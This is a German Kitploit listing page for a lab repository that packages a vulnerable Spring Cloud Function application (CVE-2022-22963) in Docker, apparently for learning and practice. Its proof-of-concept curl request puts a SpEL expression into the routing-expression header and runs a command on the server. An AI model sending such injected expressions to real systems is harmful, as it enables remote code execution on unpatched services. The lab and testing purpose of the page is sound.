Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-22963 — Spring Cloud Function Verwundbare Anwendung / CVE-2022-22963 | Kitploit
Tools/GitHubGitHub/me2nuk/cve-2022-22963
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubme2nuk/cve-2022-22963

CVE-2022-22963

Spring Cloud Function Verwundbare Anwendung / CVE-2022-22963

Repository anzeigen
192vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring Cloud Function Schwachstelle (CVE-2022-22963)

Verwundbare Anwendung für CVE-2022-22963

CVE-2022-22963 Exploit-Demo

https://user-images.githubusercontent.com/57348147/161266562-51d025f0-54d4-488f-ac50-2317e29bfbdf.mp4

Erstellen

root@kitploit:~
docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

root@kitploit:~
curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

Referenzen

  • https://tanzu.vmware.com/security/cve-2022-22963
  • https://github.com/hktalent/spring-spel-0day-poc/blob/main/README.md
  • https://github.com/spring-cloud/spring-cloud-function
  • https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
Tool herunterladen